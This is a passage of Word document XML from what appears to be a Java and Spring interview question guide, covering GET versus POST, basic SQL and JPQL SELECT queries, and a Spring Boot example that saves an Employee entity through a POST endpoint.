          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57C7992A"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Limited by the URL length (typically 2000 characters)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F4BBF7E"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No size limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="25E26B6A" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A22E7A2"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lastRenderedPageBreak/>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181CF4B1"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trieving data or resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29E3DEAD"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Creating, updating, or submitting data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A3F8FCE"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Both methods are essential in RESTful web services. GET is used for safe, read-only requests, while POST is for creating or submitting data, often resulting in a state change on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125189E" w14:textId="0901204A"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13568C5">
          <v:rect id="_x0000_i2592" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57690543" w14:textId="461BCDAE" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00A53E99">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="603" w:name="_Toc196308083"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Write a SQL or JPQL to retrieve the data from DB</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="603"/>
    </w:p>
    <w:p w14:paraId="684DCE2E" w14:textId="62D2A919" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B8" w:rsidP="00D774B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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SQL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEBAA3F"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o retrieve data from a database using SQL, you would typically use the SELECT statement. Here's a simple example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEEE17D"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ELECT * FROM employees WHERE department = 'Sales';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694D77DC"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is SQL query retrieves all records from the employees table where the department is 'Sales'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFC3213" w14:textId="77777777" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B8"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JPQL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7519E61B"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JPQL (Java Persistence Query Language) is similar to SQL but operates on entities, not directly on database tables. Here's an example of a JPQL query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D8687"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ELECT e FROM Employee e WHERE e.department = 'Sales'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3ED877"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is JPQL query retrieves all Employee objects (from the Employee entity) where the department field equals 'Sales'. JPQL is case-sensitive, and it operates based on entity attributes rather than database column names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4903049A"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n both cases, you can also specify which fields (or columns) to retrieve, add ordering, limit results, and more, depending on your needs. Here's how you could do it for both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D46AB4" w14:textId="77777777" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B8"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SQL with specific fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570E3E4D"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ELECT name, age FROM employees WHERE department = 'Sales';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5878F1AE" w14:textId="77777777" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B8"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JPQL with specific fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DC74A8"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ELECT e.name, e.age FROM Employee e WHERE e.department = 'Sales'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E741FB5" w14:textId="77777777" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B8"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Both SQL and JPQL allow you to retrieve data based on conditions, and they are used in different contexts, with SQL interacting directly with the database and JPQL with JPA entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D811C87" w14:textId="1724946A"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2B43A12">
          <v:rect id="_x0000_i2593" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A7FCAB" w14:textId="6764AAF1" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="0026420D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="604" w:name="_Toc196308084"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you add Employee object data in the DB using POST call</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="604"/>
    </w:p>
    <w:p w14:paraId="58538DC9" w14:textId="2959EC8F" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82"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o add an Employee object to the database using a POST request in a Spring Boot application, you need to do the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18732A4B" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82"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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152A43A9"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Create the Employee Entity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You need an entity class to map the Employee object to a table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117257A8"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javax.persistence.Entity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A99706A"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javax.persistence.Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7A8F0B" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47CE4820"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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB1D721"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7496EF37" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D641634"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B4A13B"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239A3432"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD11AE2"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String department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A013D33"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double salary;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9592FC" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4134B5FF"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 Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E36D992"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Long getId() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39457907"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id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3940C3DB"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04A678E3" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01784528"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void setId(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E01B4D8"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this.id = id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2283ADD8"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30B101B9" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119BF046"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String getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265D6DA5"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69441FF7"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758B3C71" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799AA299"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void setName(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5CC8FC"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this.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9739B2"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1A8D4CD0" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C897A9"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String getDepartment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6F0EE7"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department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429B8BF5"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64552040" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C326D2"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void setDepartment(String department) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B50B86"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this.department = department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4187E73A"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15BE63DB" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44097C7C"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double getSalary() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF9762B"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salary;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F37104A"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4E7890FE" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="025F3D43"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void setSalary(double salary) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABDF6C7"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this.salary = salary;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B0F60F"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13DC45B0"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046A392C"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Create a Repository Interface:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This interface extends JpaRepository to handle basic CRUD operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A20045A"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data.jpa.repository.JpaRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3953F9D1" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A389FC"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interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF17831"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439CBC01"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Create a Service Layer (optional but recommended):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The service layer will handle the business logic and interact with the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE541C9"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C19AA89"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB046FA" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="189FAC61"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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A4CA9F"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EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE173F" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACE8B6E"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C7AFA3"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EmployeeRepository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A9CE49" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485BD110"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ublic Employee saveEmployee(Employee employee) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570271C"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employeeRepository.save(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A991DE9"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1F1D4B17"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41D663DB"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Create a Controller to Handle the POST Request:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The controller will handle HTTP requests, including the POST request to add an Employee object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C1B2BB"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F29889"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http.HttpStatus;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD28921"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http.ResponseEntity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E363CC"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import org.springframework.web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3378546A" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A4B2F0A"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215865E1"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questMapping("/api/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57493B02"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public class EmployeeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F69A680" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03255020"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497F8403"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rivate EmployeeService employeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF83D43" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D52F979"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PostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33397166"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    public ResponseEntity&lt;Employee&gt; addEmployee(@RequestBody Employee employee) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC012BF"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Employee savedEmployee = employeeService.saveEmployee(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9C082D"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return new ResponseEntity&lt;&gt;(savedEmployee, HttpStatus.CREATED);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F25135"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63223432"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3239491E" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB6CD67"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estController</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Marks the class as a REST controller, capable of handling HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F2C987"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equestMapping("/api/employees")</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the base URL for the employee-related operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A031A"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PostMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies that this method handles POST requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C5EC17"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equestBody</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Indicates that the Employee data will be provided in the body of the request (typically in JSON format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFEFA8E"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esponseEntity&lt;Employee&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns the saved Employee along with the HTTP status code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDF0F60" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82"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 POST Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5D9E09"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 client would send a POST request to http://localhost:8080/api/employees with the body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71846FAC"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00BD005D"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id": 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC3B265"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name": "John Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079FB8E5"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department": "Sales",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1584CCEF"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salary": 50000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B6B8F4"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56E23118" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82"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Example Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E82585C"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 response will be a JSON representation of the saved Employee object, along with the 201 Created HTTP status code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298497D1"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5EC0F0F6"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id": 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8E483"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name": "John Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43933295"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department": "Sales",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0108526D"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  "salary": 50000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374EE056"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68011AAF" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82"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 employee is successfully saved in the database through the POST call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DCAE9F" w14:textId="5104A879"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BFA00FC">
          <v:rect id="_x0000_i2594" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F186AC4" w14:textId="6F18A3CF" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00437F52">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="605" w:name="_Toc196308085"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the size of Spring in your project? Who will decide that</w:t>
      </w:r>
